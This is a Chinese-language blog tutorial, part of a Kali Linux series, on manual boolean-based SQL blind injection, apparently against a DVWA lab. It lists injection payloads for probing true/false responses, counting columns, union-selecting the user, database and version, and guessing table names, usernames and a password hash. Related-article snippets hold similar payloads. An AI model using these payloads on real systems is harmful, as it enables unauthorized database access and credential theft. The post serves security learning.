第十三章—手动漏洞挖掘(八)——SQL盲注(三)

最新推荐文章于 2022-03-05 18:18:58 发布
最新推荐文章于 2022-03-05 18:18:58 发布
阅读量207 收藏
点赞数
分类专栏: kail
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876557/article/details/114385141
版权

sql盲注

前面讲的sql注入内容都是基于输入错误的sql语句,服务器会返回数据库内建的报错信息,所以我们可以猜测他的数据库是怎么构造的。
当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,sql注入将无法依据报错信息判断注入语句的执行结果,即盲。
思路:既然无法基于报错信息判断结果,我们可以基于逻辑真假的不同结果来判断。

1' and 1=1-- 
1' and 1=2--

在这里插入图片描述
结果为假时,无内容显示。
在这里插入图片描述

1' order by 5-- 
1' order by 2--

在这里插入图片描述
在这里插入图片描述

1.有权读取information_schema库
1' union select null,concat_ws(char(32,52,32),user(),database(),version())--

在这里插入图片描述

2.无权读取information_schema库
(1)猜列名
1' and user is not null--

为假无结果
在这里插入图片描述
在这里插入图片描述

为真有结果,所以有user这一列
在这里插入图片描述

(2)猜当前表名
1' and users.user is not null--

在这里插入图片描述

在这里插入图片描述

(3)猜表名
1' and (select count(*) from guestbook)>0--

在这里插入图片描述

(4)猜字段
1' and user='admin
1' or user like '%a%

在这里插入图片描述

在这里插入图片描述

(5)猜账号对应密码
1' or user='admin' and password='5f4dcc3b5aa765d61d8327deb8821f99

在这里插入图片描述

小依真
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WEB手动漏洞挖掘-SQL(DVWA实战)
含笑
05-20 6524
select * from table_name where id = ’ 1’ and 1=1– ’ 在里至少要有一个正确的结果;否则不显示; 1'order by 5--+ 1'order by 3--+1'union select 1,2--+ 1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),
多线程+二分法的巧用——通达OA SQL1
08-03
声明由于传播、利此所提供的信息造成的任何直接或者间接的后果及损失,均由使者本负责,雷神众测以及章作者不为此承担任何责任。雷神众测拥有对此章的修改和解释权。如欲转
第十三章—手动漏洞挖掘(五)——SQL入(一)
weixin_43876557的博客
03-01 477
lsb_release -a #查看kail的运行版本 SQL入 服务器端程序将用户输入参数作为查询条件,直接拼接sql语句,并将查询结果返回给客户端浏览器。
第十三章—手动漏洞挖掘(六)——SQL入(二)
weixin_43876557的博客
03-04 316
一、读取文件
手动漏洞挖掘(DVWA)SQL
weixin_30337251的博客
07-09 157
SQL入的原因是因为服务器没有对 客户端数据进行判断,并且前端的数据是攻击者可以控制,攻击者就可以构造不同的语句对数据库进行任意操作 寻找SQL入点方式: 1.查看是否报错,从而判断是否对输入的SQL语句进行筛查 还是基于DVWA,我们输入'1'的时候: 提示我们输入错误,这里显示'1'''说明页面在接受我们输入的时候,是将我们的数据放置...
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1576
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
SQL漏洞-SQL
HacHunter的博客
03-05 739
,从字面意思理解就是看不见的入,其实这还是属于入的一种,只是表现形式不同。是不能通过直接显示的途径来获取数据库数据的方法。在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。也就是说执行插入的语句后,不管是否执行,是否成功,都不会回显详细的错误信息,不像普通入一样那么容易判断。但是,入攻击还是发生了,只是错误信息被屏蔽掉了,请记住这个就好。一般情况下,可分为三类: Booleanbase普通 Timebase 基于时间的...
web渗透测试----26、SQL漏洞--(2)SQL漏洞挖掘(白盒)
七天
09-06 1423
SQL漏洞白盒挖掘方法
Kali Linux学习笔记—Web渗透(5)手动漏洞挖掘 SQL
weixin_43653897的博客
12-18 716
SQLSQL漏洞原理查询方法基于报错的检测方法(low)基于布尔的检测order by排序联合查询实践简单利用权限分离绕过服务器过滤无权读取information_schema库 实验环境: metasploitable:172.16.2.63 Security Level:low kali linux:172.16.2.65 SQL漏洞原理 服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 用户登录判断 SELECT * FROM users W
第十三章—手动漏洞挖掘(九)——SQLMAP自动入(三)
weixin_43876557的博客
03-25 247
Sqlmap自动入(三) 1.Optimization参数 Optimization——优化 #相当于把--predict-output、--keep-alive、--null-connection参数都加上了 -o #预设的输出。根据检测方法,对比返回值和统计表内容,不断缩小检测范围,提高检测效率,与--threads参数不兼容 #可以检测版本号、用户名、密码、privileges、role、数据库名称、表名、列名 #find / -name common-outputs.txt查看到统计表文件位置为
Web应用手工渗透测试——用SQLMap进行SQL测试
02-26
本文将更进一步,讨论SQL,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先册一个...
python编写的sql
10-28
python编写的sql
布尔.py_sqlpython_
10-03
一个简单的sql的python脚本,其中语句需要根据环境条件做改变
数据库原理-第三章作业SQL解答
12-11
数据库原理第六版书籍,第三章作业SQL语句解答,本题主要考核的 SQL 语句,一般情况对于多表查询,通常同一个查询可以有不 同方案,所以关方案的差异。同样需要SQL 运算符及其格式的规范性, 一般情况下能用...
第八章(二)—漏洞扫描(nmap脚本使用)
weixin_43876557的博客
06-05 8246
nmap脚本 nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。 /usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放 cat script.db less script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本 每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类 smb-vuln-ms10-061.nse 这个脚本是stuxnet蠕虫利
第八章(三)—漏洞扫描(openvas)
weixin_43876557的博客
06-05 5495
nmap脚本 nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。 /usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放 cat script.db less script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本 每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类 smb-vuln-ms10-061.nse 这个脚本是stuxnet蠕虫利
第十三章——Burpsuite二(Dashboard、Intruder)
weixin_43876557的博客
09-16 3020
Burpsuite spider
kail教程(一)——vmware安装kail
weixin_43876557的博客
02-24 2540
1.进入安装引导页,该选项是带有图形界面。 2.选择语言为中文(简体) 3.国家默认为中国 4.键盘默认为汉语键位 5.等待进度 6.配置系统主机名 7.此步域名不填写 8.配置root用户和密码 9.等待进度自动配置时钟 10.磁盘配置使用整个磁盘 11.磁盘分区格盘写入确认 12.磁盘分区方案默认选择第一项,初学都建议这个选项 13.此步直接结束分区设定 14.同意磁盘分区操作...
pikachu——布尔
最新发布
10-03
在布尔中,攻击者通过构造不同的SQL语句来判断查询的结果是真还是假,从而获取敏感信息。通过输入不同的条件,攻击者可以观察到页面上的0和1的变化,或者监控后台执行的时间来判断查询是否成功。 在这个特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值